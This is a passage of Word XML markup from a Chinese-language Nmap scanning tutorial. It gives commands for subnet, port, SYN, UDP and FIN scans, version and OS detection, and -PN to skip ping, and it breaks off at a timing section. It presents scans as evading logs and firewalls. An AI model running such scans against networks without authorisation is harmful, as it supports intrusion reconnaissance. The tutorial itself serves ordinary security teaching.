    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>#nmap -sL 192.16</w:t>
      </w:r>
      <w:r>
        <w:t>8.1.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描除过某一个ip外的所有子网主机,命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>#nmap 192.</w:t>
      </w:r>
      <w:r>
        <w:t>168.1.1/24 -exclude 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描除过某一个文件中的ip外的子网主机命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>#nmap 192.168.1.1/24 -exclude file xxx.txt  (xxx.txt中的文件将会从扫描的主机中排除</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描特定主机上的80,21,23端口,命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#nmap -p80,21,23 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zui</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>举例</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描局域网中IP地址为</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>10.180.187.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的主机。执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>nmap -T4 -A -v 10.180.187.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4069961C" wp14:editId="2DB08DD5">
            <wp:extent cx="5274310" cy="231521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315210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693E002A" wp14:editId="0A9938A8">
            <wp:extent cx="5274310" cy="448818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488180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从以上输出信息，可以看到共扫描的主机所开放的端口及服务，以及这台主机对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的操作系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc496014442"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tcp SYN Scan (sS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>这是一个基本的扫描方式,它被称为半开放扫描，因为这种技术使得Nmap不需要通过完整的握手，就能获得远程主机的信息。Nmap发送SYN包到远程主机，但是它不会产生任何会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>因此不会在目标主机上产生任何日志记录,因为没有形成会话。这个就是SYN扫描的优势</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331F4000" wp14:editId="50E717F7">
            <wp:extent cx="5274310" cy="3573145"/>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573145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C8F4203" wp14:editId="2EE43A6B">
            <wp:extent cx="4657143" cy="4228571"/>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57143" cy="4228571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc496014443"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Udp scan(sU)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>它不需要发送任何的SYN包，因为这种技术是针对UDP端口的。UDP扫描发送UDP数据包到目标主机，并等待响应,如果返回ICMP不可达的错误消息，说明端口是关闭的，如果得到正确的适当的回应，说明端口是开放的</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04A1DFBC" wp14:editId="5110E000">
            <wp:extent cx="5274310" cy="362775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627755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6E3C64" wp14:editId="130F7A62">
            <wp:extent cx="4580952" cy="4380952"/>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0952" cy="4380952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc496014444"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FIN scan (sF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>有时候Tcp SYN扫描不是最佳的扫描模式,因为有防火墙的存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>目标主机有时候可能有IDS和IPS系统的存在,防火墙会阻止掉SYN数据包。发送一个设置了FIN标志的数据包并不需要完成TCP的握手</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53D6C1F7" wp14:editId="70DBFBB1">
            <wp:extent cx="5274310" cy="36118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611880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4253A2C5" wp14:editId="1D9847F2">
            <wp:extent cx="4609524" cy="1857143"/>
            <wp:effectExtent l="0" t="0" r="63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09524" cy="1857143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一)</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>每个类型的扫描都是具有差异性的,FIN扫描发送的包只包含FIN标识,NULL扫描不发送数据包上的任何字节,XMAS扫描发送FIN、PSH和URG标识的数据包</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc496014445"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>版本检测(sV)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>版本检测是用来扫描目标主机和端口上运行的软件的版本.它不同于其它的扫描技术，它不是用来扫描目标主机上开放的端口，不过它需要从开放的端口获取信息来判断软件的版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>使用版本检测扫描之前需要先用TCP SYN扫描开放了哪些端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760CC35C" wp14:editId="62AFA651">
            <wp:extent cx="5274310" cy="359791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597910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078C620C" wp14:editId="2F9A1A10">
            <wp:extent cx="5274310" cy="5673090"/>
            <wp:effectExtent l="0" t="0" r="254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5673090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc496014446"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap的OS检测（O/PN）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Nmap最重要的特点之一是能够远程检测操作系统和软件，Nmap的OS检测技术在渗透测试中用来了解远程主机的操作系统和软件是非常有用的，通过 获取的信息你可以知道已知的漏洞。Nmap有一个名为的nmap-OS-DB数据库，该数据库包含超过2600操作系统的信息。 Nmap把TCP和UDP数据包发送到目标机器上，然后检查结果和数据库对照。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E69807" wp14:editId="3A631192">
            <wp:extent cx="5274310" cy="362458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624580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A5DD64" wp14:editId="472B0684">
            <wp:extent cx="5274310" cy="54178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5417820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>如果远程主机有防火墙，IDS和IPS系统，你可以使用-PN命令来确保不ping远程主机，因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>使用-PN参数可以绕过PING命令,但是不影响主机的系统的发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A5D0D7" wp14:editId="6C49AE9B">
            <wp:extent cx="5274310" cy="36010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601085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BC5CBA" wp14:editId="123E457B">
            <wp:extent cx="5274310" cy="52939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293995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00872BF4" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc496014447"/>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>和性能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="82" w:name="_Toc496014448"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap时间和性能参数介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Nmap开发的最高优先级是性能。在本地网络对一个主机的默认扫描需要1/5秒。而仅仅眨眼的时间，就需要扫描上万甚至几十万的主机。此外，一些特定的扫描选项会明显增加扫描时间，如UDP扫描和版本检测。同样，防火墙配置以及特殊的响应速度限制也会 增加时间。Nmap使用了并行算法和许多先进的算法来加速扫描，用户对Nmap如何 工作有最终的控制权。高级用户可以仔细地调整Nmap命令，在满足时间要求的同时获得他们所关心的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>改善扫描时间的技术有：忽略非关键的检测、升级最新版本的Nmap(性能增强不断改善)。 优化时间参数也会带来实质性的变化，这些参数如下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FC4776" wp14:editId="5E4E7A84">
            <wp:extent cx="5274310" cy="35471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547110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="83" w:name="_Toc496014449"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> min-hostgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>max-hostgroup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
